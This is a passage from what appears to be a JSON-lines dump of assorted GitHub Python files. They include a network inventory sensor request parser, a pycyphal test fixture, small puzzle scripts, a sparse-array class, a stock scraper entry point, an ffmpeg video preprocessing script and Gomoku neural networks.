pass\n\n\n def shutdown(self):\n pass\n\n\n\nclass DeviceSensorRequest:\n\n def __init__(self, request):\n self.request = request\n\n self.type = None\n self.body = None\n self.agent_hostname = None\n\n\n def sanity_check(self):\n \"\"\" Checks the fields. Must be called after initialization \"\"\"\n # Check the type\n try:\n self.type = self.request.body[DeviceSensorRequestBody.type]\n except:\n err_msg = 'ServerInterface: Missing type from device sensor request'\n logging.warning(err_msg)\n return False\n\n # Check the body (optional)\n if DeviceSensorRequestBody.body in self.request.body:\n self.body = self.request.body[DeviceSensorRequestBody.body]\n\n # Check the agent hostname\n try:\n self.agent_hostname =\\\n self.request.body[DeviceSensorRequestBody.agent_hostname]\n except:\n err_msg = 'ServerInterface: Missing hostname from device'\n err_msg += ' sensor request'\n logging.warning(err_msg)\n return False\n\n return True\n\n\n def get_type(self):\n return self.type\n\n\n def get_body(self):\n return self.body\n\n\n def get_agent_hostname(self):\n return self.agent_hostname\n\n\n\nclass DeviceSensorRealTimeClose:\n\n def __init__(self, device_sensor_request):\n self.body = device_sensor_request.get_body()\n\n self.req_id = None\n\n\n def sanity_check(self):\n try:\n self.req_id = self.body[DeviceSensorRealTimeCloseBody.req_id]\n except:\n err_msg = 'ServerInterface: Missing req_id from device sensor'\n err_msg += ' real time stop request'\n logging.warning(err_msg)\n return False\n \n return True\n\n\n def get_request_id(self):\n return self.req_id\n\n\n\nclass DeviceSensorRequestBody:\n \"\"\"\n * type: The type of the request. This can have one of the\n following values:\n - \"REAL_TIME_REQUEST\": The requesting side wants to receive real time\n information about the device CPU%, RAM%, Network Received and Sent\n bytes over the last second.\n - \"REAL_TIME_CLOSE\": The requesting wants to stop receiving real time\n information.\n - \"GET_NOTIFICATION_COND\": Get the JSON with the associated notification\n conditions for the Device Sensor.\n - \"SET_NOTIFICATION_COND\": Set the JSON with the associated notification\n conditions for the Device Sensor.\n - \"GET_REPORT_TEMPLATE\": Get the pre-formatted body of the report.\n - \"SET_REPORT_TEMPLATE\": Set the pre-formatted body of the report.\n * body: The body of the request.\n * agent_hostname: The hostname on which the agent is installed.\n \"\"\"\n type = 'device_sensor_type'\n body = 'device_sensor_body'\n agent_hostname = 'agent_hostname'\n\n\n\nclass DeviceSensorRealTimeCloseBody:\n \"\"\"\n The fields for the body of the request when type is \"REAL_TIME_CLOSE\":\n * req_id: The request id of the original \"REAL_TIME_REQUEST\".\n \"\"\"\n req_id = 'req_id'","repo_name":"umitproject/network-inventory","sub_path":"umit/inventory/modules/server/DeviceSensor.py","file_name":"DeviceSensor.py","file_ext":"py","file_size_in_byte":9484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"21411793935","text":"import sys\nimport pickle\nimport typing\nimport shutil\nimport logging\nimport functools\nimport importlib\nfrom pathlib import Path\nimport pytest\nimport pycyphal.dsdl\n\n\n# Please maintain these carefully if you're changing the project's directory structure.\nSELF_DIR = Path(__file__).resolve().parent\nLIBRARY_ROOT_DIR = SELF_DIR.parent.parent\nDEMO_DIR = LIBRARY_ROOT_DIR / \"demo\"\nDESTINATION_DIR = Path.cwd().resolve() / \".compiled\"\n\n_CACHE_FILE_NAME = 
\"pydsdl_cache.pickle.tmp\"\n\n\n@functools.lru_cache()\ndef compile() -> typing.List[pycyphal.dsdl.GeneratedPackageInfo]: # pylint: disable=redefined-builtin\n \"\"\"\n Runs the DSDL package generator against the standard and test namespaces, emits a list of GeneratedPackageInfo.\n Automatically adds the path to the generated packages to sys path to make them importable.\n The output is cached permanently on disk in a file in the output directory because the workings of PyDSDL or\n Nunavut are outside of the scope of responsibilities of this test suite, yet generation takes a long time.\n To force regeneration, remove the generated package directories.\n \"\"\"\n if str(DESTINATION_DIR) not in sys.path: # pragma: no cover\n sys.path.insert(0, str(DESTINATION_DIR))\n importlib.invalidate_caches()\n cache_file = DESTINATION_DIR / _CACHE_FILE_NAME\n\n if DESTINATION_DIR.exists(): # pragma: no cover\n if cache_file.exists():\n with open(cache_file, \"rb\") as f:\n out = pickle.load(f)\n assert out and isinstance(out, list)\n assert all(map(lambda x: isinstance(x, pycyphal.dsdl.GeneratedPackageInfo), out))\n return out\n\n shutil.rmtree(DESTINATION_DIR, ignore_errors=True)\n DESTINATION_DIR.mkdir(parents=True, exist_ok=True)\n\n pydsdl_logger = logging.getLogger(\"pydsdl\")\n pydsdl_logging_level = pydsdl_logger.level\n try:\n pydsdl_logger.setLevel(logging.INFO)\n out = pycyphal.dsdl.compile_all(\n [\n DEMO_DIR / \"public_regulated_data_types\" / \"uavcan\",\n DEMO_DIR / \"custom_data_types\" / \"sirius_cyber_corp\",\n SELF_DIR / \"test_dsdl_namespace\",\n ],\n DESTINATION_DIR,\n )\n finally:\n pydsdl_logger.setLevel(pydsdl_logging_level)\n\n with open(cache_file, \"wb\") as f:\n pickle.dump(out, f)\n\n assert out and isinstance(out, list)\n assert all(map(lambda x: isinstance(x, pycyphal.dsdl.GeneratedPackageInfo), out))\n return out\n\n\ncompiled = pytest.fixture(scope=\"session\")(compile)\n","repo_name":"OpenCyphal/pycyphal","sub_path":"tests/dsdl/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"75"} +{"seq_id":"12717060331","text":"def is_prime(n):\n if n <= 1:\n return False\n if n <= 3:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n i = 5\n\n while i * i <= n:\n if n % i == 0:\n return False\n i += 6\n return True\n\nli = [x for x in range(2, 10**3) if is_prime(x)]\n\nms, mr = 0, -1\n\nfor i in range(len(li)):\n s = 0\n for j in range(i, len(li)):\n s += li[j]\n if s > 10**6:\n break\n if (is_prime(s) and s > ms and j - i > mr):\n mr = j - i\n ms = s\nprint(ms, mr)\n\n","repo_name":"KafkaOnTheInternet/Project-Euler---C","sub_path":"e50.py","file_name":"e50.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30404698039","text":"\n\ndef _short(s):\n return s[:1021] + \"...\" if len(s) > 1024 else s\n\n\ndef split_text(text, MAX_LEN=1024):\n \"\"\"Return list of strings with at most MAX_LEN length, and be nice with formatting\"\"\"\n if \"```\" in text:\n MAX_LEN = max(1, MAX_LEN-3)\n ret = []\n if \"--message-split--\" in text:\n texts = text.split(\"--message-split--\")\n for t in texts:\n ret += split_text(t)\n return ret\n num_block_markers = 0\n need_block_begin = False\n while len(text):\n msg = text[:MAX_LEN]\n num_block_markers += msg.count(\"```\")\n if len(msg) < MAX_LEN:\n chunk = len(msg)\n else:\n chunk = -1\n for sep in (\"\\n\", 
\" \", \".\", \";\", \",\"):\n chunk = msg.rfind(sep)\n if chunk > 0:\n if sep in (\"\\n\", \" \"):\n text = text[:chunk] + text[chunk + 1:]\n break\n if chunk < 0:\n chunk = MAX_LEN\n\n msg = text[:chunk]\n if not len(msg):\n break\n if need_block_begin:\n msg = \"```\" + msg\n need_block_begin = False\n if num_block_markers % 2 == 1:\n msg += \"```\"\n need_block_begin = True\n ret.append(msg)\n text = text[chunk:]\n return ret\n","repo_name":"defgsus/brain-discord","sub_path":"tools/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72942166642","text":"import os\nimport shutil\nimport tarfile\nimport subprocess\nfrom glob import glob\n\nffmpeg_exe = \"C:\\\\Users\\\\86712\\\\source\\\\ffmpeg\\\\bin\\\\ffmpeg.exe\"\nStereoBlur_root = \"D:\\\\dataset\\\\StereoBlur\\\\\"\nStereoBlur_out_root = \"D:\\\\dataset\\\\StereoBlur_processed\\\\\"\n\nfile_list = glob(os.path.join(StereoBlur_root, \"HD*.tar.gz\"))\nfor file_name in file_list:\n file_base = os.path.basename(file_name).split('.')[0]\n file = tarfile.open(file_name, 'r:gz')\n file.extractall(StereoBlur_root)\n\n extrachpath = os.path.join(StereoBlur_root, file_base)\n image_left_path = os.path.join(extrachpath, \"image_left\")\n image_right_path = os.path.join(extrachpath, \"image_right\")\n\n converter_args = [\n ffmpeg_exe,\n '-i', os.path.join(image_left_path, \"%04d.png\"),\n '-i', os.path.join(image_right_path, \"%04d.png\"),\n '-filter_complex', \"hstack\",\n '-c:v', 'libx264',\n os.path.join(StereoBlur_out_root, f\"{file_base}.mp4\")\n ]\n\n converter_output = (subprocess.check_output(converter_args))\n print(f\"removing extracted folder {file_base}\")\n shutil.rmtree(extrachpath)\n","repo_name":"limacv/mono_mpv","sub_path":"script/preprocess_stereoblur.py","file_name":"preprocess_stereoblur.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"22247697979","text":"import numpy as np\r\nfrom functools import reduce\r\nfrom operator import mul\r\nfrom sparse import SparseArray\r\nfrom sparse.coo.common import linear_loc\r\nfrom sparse.utils import normalize_axis, equivalent, check_zero_fill_value, _zero_of_dtype\r\nimport sparse\r\nimport scipy.sparse as ss\r\nfrom .convert import compress_dimension, uncompress_dimension\r\nfrom .indexing import getitem\r\n\r\n\r\n\r\ndef _from_coo(x,format):\r\n midpoint = int(len(x.shape) // 2)\r\n midpoint = midpoint + 1 if len(x.shape) % 2 == 1 else midpoint # where do col axes start\r\n if len(x.shape)==3:\r\n midpoint = 2\r\n row_size = int(np.prod(x.shape[:midpoint]))\r\n col_size = int(np.prod(x.shape[midpoint:]))\r\n coords = x.reshape((row_size,col_size)).coords\r\n\r\n if format is 'CSR':\r\n indptr = np.zeros(row_size+1,dtype=int)\r\n np.cumsum(np.bincount(coords[0], minlength=row_size), out=indptr[1:])\r\n indices = coords[1]\r\n data = x.data\r\n else: \r\n linear = linear_loc(coords[[1,0]],(col_size,row_size))\r\n order = np.argsort(linear)\r\n coords = coords[:,order]\r\n indptr = np.zeros(col_size+1,dtype=int)\r\n np.cumsum(np.bincount(coords[1], minlength=col_size), out=indptr[1:])\r\n indices = coords[0]\r\n data = x.data[order]\r\n return (data,indices,indptr), x.shape, x.fill_value\r\n\r\nclass compressed(SparseArray):\r\n\r\n def __init__(self,arg,shape=None,fill_value=0):\r\n\r\n if isinstance(arg,np.ndarray):\r\n arg, shape, 
fill_value = _from_coo(sparse.COO(arg),self.format)\r\n\r\n elif isinstance(arg,sparse.coo.core.COO):\r\n arg, shape, fill_value = _from_coo(arg,self.format)\r\n\r\n if isinstance(arg,tuple):\r\n data,indices,indptr = arg\r\n self.data = data\r\n self.indices = indices\r\n self.indptr = indptr\r\n self.shape = shape\r\n sl = len(shape)\r\n row_size = int(np.prod(shape[:sl//2+1]) if sl%2==1 else np.prod(shape[:sl//2]))\r\n col_size = int(np.prod(shape[sl//2+1:]) if sl%2==1 else np.prod(shape[sl//2:]))\r\n self.compressed_shape = (row_size,col_size)\r\n self.fill_value = fill_value\r\n self.dtype = self.data.dtype\r\n\r\n @classmethod\r\n def from_numpy(cls,x,fill_value=0):\r\n coo = sparse.COO(x,fill_value=fill_value)\r\n return cls.from_coo(coo)\r\n\r\n\r\n @classmethod\r\n def from_coo(cls,x):\r\n arg, shape, fill_value = _from_coo(x,cls.format)\r\n return cls(arg,shape=shape,fill_value=fill_value)\r\n\r\n @classmethod\r\n def from_scipy_sparse(cls,x):\r\n if cls.format is 'CSR':\r\n x = x.asformat('csr')\r\n return cls((x.data,x.indices,x.indptr),shape=x.shape)\r\n else:\r\n x = x.asformat('csc')\r\n return cls((x.data,x.indices,x.indptr),shape=x.shape)\r\n \r\n\r\n @classmethod\r\n def from_iter(cls,x,shape=None,fill_value=None):\r\n return cls.from_coo(sparse.COO.from_iter(x,shape,fill_value))\r\n\r\n @property\r\n def nnz(self):\r\n return self.data.shape[0]\r\n\r\n @property\r\n def nbytes(self):\r\n return self.data.nbytes + self.indices.nbytes + self.indptr.nbytes\r\n \r\n @property\r\n def density(self):\r\n return self.nnz / reduce(mul,self.shape)\r\n\r\n @property\r\n def ndim(self):\r\n return len(self.shape)\r\n\r\n def __str__(self):\r\n return '<{}: shape={}, dtype={}, nnz={}, fill_value={}>'.format(self.format,self.shape,self.dtype,self.nnz,self.fill_value)\r\n\r\n __repr__ = __str__ \r\n\r\n\r\n __getitem__ = getitem\r\n\r\n def tocoo(self):\r\n uncompressed = uncompress_dimension(self.indptr,self.indices)\r\n coords = np.vstack((uncompressed,self.indices)) if self.format is 'CSR' else np.vstack((self.indices,uncompressed))\r\n return sparse.COO(coords,self.data,shape=self.compressed_shape,fill_value=self.fill_value).reshape(self.shape) \r\n\r\n def todense(self): \r\n return self.tocoo().todense()\r\n \r\n\r\n def todok(self):\r\n\r\n from sparse import DOK \r\n return DOK.from_coo(self.tocoo()) # probably a temporary solution\r\n\r\n\r\n def to_scipy_sparse(self):\r\n \"\"\"\r\n Converts this :obj:`CSR` or `CSC` object into a :obj:`scipy.sparse.csr_matrix` or `scipy.sparse.csc_matrix`.\r\n Returns\r\n -------\r\n :obj:`scipy.sparse.csr_matrix` or `scipy.sparse.csc_matrix`\r\n The converted Scipy sparse matrix.\r\n Raises\r\n ------\r\n ValueError\r\n If the array is not two-dimensional.\r\n ValueError\r\n If all the array doesn't zero fill-values.\r\n \"\"\"\r\n \r\n check_zero_fill_value(self)\r\n\r\n if self.ndim != 2:\r\n raise ValueError(\"Can only convert a 2-dimensional array to a Scipy sparse matrix.\")\r\n\r\n if self.format is 'CSR':\r\n return ss.csr_matrix((self.data,self.indices,self.indptr),shape=self.shape)\r\n else:\r\n return ss.csc_matrix((self.data,self.indices,self.indptr),shape=self.shape)\r\n\r\n \r\n def asformat(self,format):\r\n \"\"\"\r\n Convert this sparse array to a given format.\r\n Parameters\r\n ----------\r\n format : str\r\n A format string.\r\n Returns\r\n -------\r\n out : SparseArray\r\n The converted array.\r\n Raises\r\n ------\r\n NotImplementedError\r\n If the format isn't supported.\r\n \"\"\"\r\n\r\n if format is 'coo':\r\n 
return self.tocoo()\r\n elif format is 'csc':\r\n return self.tocsc()\r\n elif format is 'csr':\r\n return self.tocsr()\r\n elif format is 'dok':\r\n return self.todok()\r\n \r\n raise NotImplementedError('The given format is not supported.')\r\n\r\n\r\n def maybe_densify(self, max_size=1000, min_density=0.25):\r\n \"\"\"\r\n Converts this :obj:`CSR` or `CSC` array to a :obj:`numpy.ndarray` if not too\r\n costly.\r\n Parameters\r\n ----------\r\n max_size : int\r\n Maximum number of elements in output\r\n min_density : float\r\n Minimum density of output\r\n Returns\r\n -------\r\n numpy.ndarray\r\n The dense array.\r\n Raises\r\n -------\r\n ValueError\r\n If the returned array would be too large.\r\n \"\"\"\r\n\r\n if self.size <= max_size or self.density >= min_density:\r\n return self.todense()\r\n else:\r\n raise ValueError(\"Operation would require converting \"\r\n \"large sparse array to dense\")\r\n \r\n\r\n def reshape(self,shape, order='C'):\r\n \"\"\"\r\n Returns a new :obj:`CSR` or `CSC` array that is a reshaped version of this array.\r\n Parameters\r\n ----------\r\n shape : tuple[int]\r\n The desired shape of the output array.\r\n Returns\r\n -------\r\n CSR or CSC\r\n The reshaped output array.\r\n See Also\r\n --------\r\n numpy.ndarray.reshape : The equivalent Numpy function.\r\n sparse.COO.reshape: The equivalent COO function.\r\n Notes\r\n -----\r\n The :code:`order` parameter is provided just for compatibility with\r\n Numpy and isn't actually supported.\r\n \r\n \"\"\"\r\n\r\n\r\n if order not in {'C', None}:\r\n raise NotImplementedError(\"The 'order' parameter is not supported\")\r\n if any(d == -1 for d in shape):\r\n extra = int(self.size /\r\n np.prod([d for d in shape if d != -1]))\r\n shape = tuple([d if d != -1 else extra for d in shape])\r\n\r\n if self.shape==shape:\r\n return self\r\n \r\n if self.size != reduce(mul,shape,1):\r\n raise ValueError('cannot reshape array of size {} into shape {}'.format(self.size,shape))\r\n \r\n midpoint = int(len(shape)//2)\r\n midpoint = midpoint + 1 if len(shape) % 2 == 1 else midpoint\r\n row_size = np.prod(shape[:midpoint])\r\n col_size = np.prod(shape[midpoint:])\r\n uncompressed = uncompress_dimension(self.indptr,self.indices)\r\n coords = np.vstack((uncompressed,self.indices)) if self.format is \"CSR\" else np.vstack((self.indices,uncompressed))\r\n reshaped_coords = sparse.COO(coords,self.data,shape=self.compressed_shape).reshape((row_size,col_size)).coords\r\n\r\n if self.format is 'CSR':\r\n indptr = np.zeros(row_size+1,dtype=int)\r\n np.cumsum(np.bincount(reshaped_coords[0], minlength=row_size), out=indptr[1:])\r\n indices = reshaped_coords[1]\r\n else:\r\n indptr = np.zeros(col_size+1,dtype=int)\r\n np.cumsum(np.bincount(reshaped_coords[1], minlength=col_size), out=indptr[1:])\r\n indices = reshaped_coords[0]\r\n \r\n return self.__class__((self.data,indices,indptr),shape=shape,fill_value=self.fill_value)\r\n \r\n \r\n \r\n\r\n def resize(self, *args, refcheck=True):\r\n \"\"\"\r\n This method changes the shape and size of an array in-place.\r\n \r\n Parameters\r\n ----------\r\n args : tuple, or series of integers\r\n The desired shape of the output array.\r\n \r\n See Also\r\n --------\r\n numpy.ndarray.resize : The equivalent Numpy function.\r\n sparse.COO.resize : The equivalent COO function.\r\n\r\n \"\"\"\r\n \r\n if len(args) == 1 and isinstance(args[0], tuple):\r\n shape = args[0]\r\n elif all(isinstance(arg, int) for arg in args):\r\n shape = tuple(args)\r\n else:\r\n raise ValueError('Invalid 
input')\r\n\r\n \r\n if any(d < 0 for d in shape):\r\n raise ValueError('negative dimensions not allowed')\r\n \r\n if self.shape==shape:\r\n return\r\n \r\n \r\n midpoint = int(len(shape)//2)\r\n midpoint = midpoint + 1 if len(shape) % 2 == 1 else midpoint\r\n row_size = np.prod(shape[:midpoint])\r\n col_size = np.prod(shape[midpoint:])\r\n uncompressed = uncompress_dimension(self.indptr,self.indices)\r\n coords = np.vstack((uncompressed,self.indices)) if self.format is \"CSR\" else np.vstack((self.indices,uncompressed))\r\n resized = sparse.COO(coords,self.data,shape=self.compressed_shape).resize((row_size,col_size))\r\n resized_coords = resized.coords\r\n self.data = resized.data\r\n self.shape = shape\r\n\r\n if self.format is 'CSR':\r\n self.indptr = np.zeros(row_size+1,dtype=int)\r\n np.cumsum(np.bincount(resized_coords[0], minlength=row_size), out=self.indptr[1:])\r\n self.indices = resized_coords[1]\r\n else:\r\n self.indptr = np.zeros(col_size+1,dtype=int)\r\n np.cumsum(np.bincount(resized_coords[1], minlength=col_size), out=self.indptr[1:])\r\n self.indices = resized_coords[0]\r\n \r\n","repo_name":"daletovar/csparse","sub_path":"GCRS2/compressed.py","file_name":"compressed.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"70591725364","text":"import argparse\nimport time\n\nfrom relay_base_class import (FuzzMRelayBaseThreadClass)\n\nclass PrintRelay(FuzzMRelayBaseThreadClass):\n\n def __init__(self, host):\n super(PrintRelay, self).__init__(host,queue_bound=100)\n \n def processTestVector(self,msg):\n print(\"Test Vector \" + str(time.time() // 1))\n time.sleep(1)\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Run the Slow Relay\")\n parser.add_argument('-a', '--amqp', help=\"URL of AMQP server\")\n parser.set_defaults(amqp='localhost')\n args = parser.parse_args()\n\n relay = PrintRelay(args.amqp)\n relay.start()\n try:\n relay.join()\n except KeyboardInterrupt:\n relay.stop()\n relay.join()\n\nif __name__ == '__main__':\n main()\n","repo_name":"collins-research/FuzzM","sub_path":"relay-base/slow.py","file_name":"slow.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"75"} +{"seq_id":"27497685053","text":"from bs4 import BeautifulSoup\nimport sys\nfrom time import time\nfrom nzxscraper.scrape_data import get_browser, list_companies, scrape_company\nfrom nzxscraper.save_data import save_data, save_log_to_pastebin\nfrom nzxscraper.environment import DEBUG, downloadDirectory, COMPANIES\nimport shutil\nfrom nzxscraper import logger, printProgressBar\nfrom nzxscraper.analyse import analyse_company_risk, score_companies\n\ndef start_scraping():\n # Log environment\n logger.info(\"Download directory: \" + downloadDirectory)\n startTime = time()\n browser = get_browser()\n success = False\n\n try:\n stockTickersList = list_companies(browser)\n\n # Initialise the array which is going to store Stock class objects\n stockDataArray = []\n\n # For each ticker in the list, find the link to the respective summary page\n stockIteration = 0\n printProgressBar(stockIteration, len(stockTickersList), prefix='Scraping company data', suffix = 'of companies completed', length=50)\n for stock in stockTickersList :\n stockData = scrape_company(browser, stock)\n stockDataArray.append(stockData)\n stockIteration += 1\n printProgressBar(stockIteration, len(stockTickersList), prefix='Scraping 
company data', suffix = 'of companies completed', length=50)\n success = True\n logger.info(\"Scraping complete\")\n print(\"Scraping complete\")\n finally:\n browser.quit()\n if success:\n analyse_company_risk(stockDataArray)\n score_companies(stockDataArray)\n save_data(stockDataArray, success)\n logger.info(\"Temporary files deleted\")\n shutil.rmtree(downloadDirectory)\n\n endTime = time()\n logger.info(\"That took a total of: \" + str(round(endTime-startTime)) + \" seconds.\")\n logger.info(str(round((endTime-startTime)/COMPANIES)) + \" seconds per company.\")\n logger.info(\"Scraping and saving complete\")\n print(\"That took a total of: \" + str(round(endTime-startTime)) + \" seconds.\")\n print(str(round((endTime-startTime)/COMPANIES)) + \" seconds per company.\")\n print(\"Scraping and saving complete\")\n # Pastebin logs are currently disabled as feature is not working as intended\n # save_log_to_pastebin()\n\nif __name__ == \"__main__\":\n start_scraping()\n","repo_name":"DrCoco/NZXDataScrapper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"19888057036","text":"'''\npython program to find if integer n is a palindrome\nInputs: n - int\nOutputs: ans - boolean\nHow to do it?\nInput n\nInitialise mirror_n = 0\nRepeat\n\tFind the last digit of n\n\tInclude the last digit of n in mirror_n\n\tRemove the last digit of n\nTest if n is equal to mirror_n\n'''\n\nimport math\n\ndef isPalindrome():\n\t\n\t# input n\n\tn = int(input(\"n = \"))\n\t\n\t# initialaze a variable equal to n to test at the end\n\tn2 = n\n\t\n\t# initialize the mirror of n to 0\n\tmirror_n = 0\n\t\n\t\n\twhile n != 0:\n\t\t# find the last digit of n\n\t\tlast = n%10\n\t\t# append last to mirror_n\n\t\tmirror_n = mirror_n * 10 + last\n\t\t# remove the last digit of n\n\t\tn = n//10\n\t\n\tif n2 == mirror_n:\n\t\tans = True\n\t\t\n\telse:\n\t\tans = False\n\t\t\n\tprint(\"Is n palindrome? 
\", ans)\n\t\t\nisPalindrome()","repo_name":"michealodwyer26/MPT-Senior","sub_path":"Homework/Week 4/isPalindrome.py","file_name":"isPalindrome.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"28684069203","text":"from pathlib import Path\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom torchvision.models.resnet import BasicBlock, Bottleneck, ResNet\n\nclass Flatten(nn.Module):\n def forward(self, input):\n return input.view(input.size(0), -1)\n\nclass ResNetGomoku(ResNet):\n def __init__(self, config):\n nn.Module.__init__(self)\n\n block = BasicBlock if config.get('res_basic_block', True) else Bottleneck \n inplanes = config.get('res_inplanes', [64, 128, 256, 512])\n num_blocks = config.get('res_num_blocks', [3, 4, 6, 3])\n self.inplanes = inplanes[0]\n self.groups = config.get('res_groups', 1)\n self.base_width = config.get('res_base_width', 64)\n \n layers = [self._make_layer(block, inplane, num_block) for inplane, num_block in zip(inplanes, num_blocks)]\n self.shared = nn.Sequential(\n nn.Conv2d(config.state_size, inplanes[0], kernel_size=5, stride=1, padding=2),\n nn.BatchNorm2d(inplanes[0]),\n nn.ReLU(inplace=True),\n *layers\n )\n\n out_plane = inplanes[-1]\n\n self.value_head = nn.Sequential(\n nn.Conv2d(out_plane, 1, kernel_size=1),\n nn.BatchNorm2d(1),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(config.board_dim ** 2, 256),\n nn.ReLU(inplace=True),\n nn.Linear(256, 1)\n )\n\n self.policy_head = nn.Sequential(\n nn.Conv2d(out_plane, 2, kernel_size=1),\n nn.BatchNorm2d(2),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(2 * config.board_dim ** 2, config.board_dim ** 2)\n )\n\n self.loss_value = nn.MSELoss()\n self.optimizer = optim.Adam(self.parameters(), lr=config.lr, weight_decay=config.l2_reg)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n \n def forward(self, x, label_value=None, label_policy=None):\n s = self.shared(x)\n v_, p_ = self.value_head(s), self.policy_head(s)\n mask = x[:, :2].sum(dim=1).byte()\n # p_.data.masked_fill_(mask.reshape(p_.shape), -np.inf)\n \n v = v_.tanh()\n p = p_.log_softmax(dim=-1).reshape(mask.shape)\n # p.data.masked_fill_(mask, 0)\n\n if label_value is None:\n return 0, dict(value=v, policy=p.exp())\n loss_value = self.loss_value(v.squeeze(dim=1), label_value)\n log_label = label_policy.log()\n log_label[torch.isinf(log_label)] = 0\n\n loss_policy = (label_policy * (log_label - p)).sum(dim=(1, 2)).mean()\n loss = loss_value + loss_policy\n entropy = -(p * p.exp()).sum(dim=(1, 2)).mean()\n return loss, dict(loss=loss, loss_value=loss_value, loss_policy=loss_policy, entropy=entropy)\n\nclass ConvNetGomoku(ResNetGomoku):\n def __init__(self, config):\n nn.Module.__init__(self)\n\n self.shared = nn.Sequential(\n nn.Conv2d(config.state_size, 32, kernel_size=5, padding=2),\n 
nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 128, kernel_size=3, padding=1)\n )\n\n self.value_head = nn.Sequential(\n nn.Conv2d(128, 2, kernel_size=1),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(2 * config.board_dim ** 2, 64),\n nn.ReLU(inplace=True),\n nn.Linear(64, 1)\n )\n\n self.policy_head = nn.Sequential(\n nn.Conv2d(128, 4, kernel_size=1),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(4 * config.board_dim ** 2, config.board_dim ** 2)\n )\n\n self.loss_value = nn.MSELoss()\n self.optimizer = optim.Adam(self.parameters(), lr=config.lr, weight_decay=config.l2_reg)\n\nclass ConvNetLargeGomoku(ResNetGomoku):\n def __init__(self, config):\n nn.Module.__init__(self)\n\n self.shared = nn.Sequential(\n nn.Conv2d(config.state_size, 32, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 128, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, kernel_size=3, padding=1)\n )\n\n self.value_head = nn.Sequential(\n nn.Conv2d(128, 2, kernel_size=1),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(2 * config.board_dim ** 2, 64),\n nn.ReLU(inplace=True),\n nn.Linear(64, 1)\n )\n\n self.policy_head = nn.Sequential(\n nn.Conv2d(128, 4, kernel_size=1),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(4 * config.board_dim ** 2, config.board_dim ** 2)\n )\n\n self.loss_value = nn.MSELoss()\n self.optimizer = optim.Adam(self.parameters(), lr=config.lr, weight_decay=config.l2_reg)\n\nclass FullyConvNetGomoku(nn.Module):\n def __init__(self, config):\n super(FullyConvNetGomoku, self).__init__()\n\n self.shared = nn.Sequential(\n nn.Conv2d(config.state_size, 32, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 128, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, kernel_size=3, padding=1)\n )\n\n self.value_head = nn.Sequential(\n nn.Conv2d(128, 64, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n )\n self.value_fc = nn.Sequential(\n nn.Linear(32, 32),\n nn.ReLU(inplace=True),\n nn.Linear(32, 1),\n nn.Tanh()\n 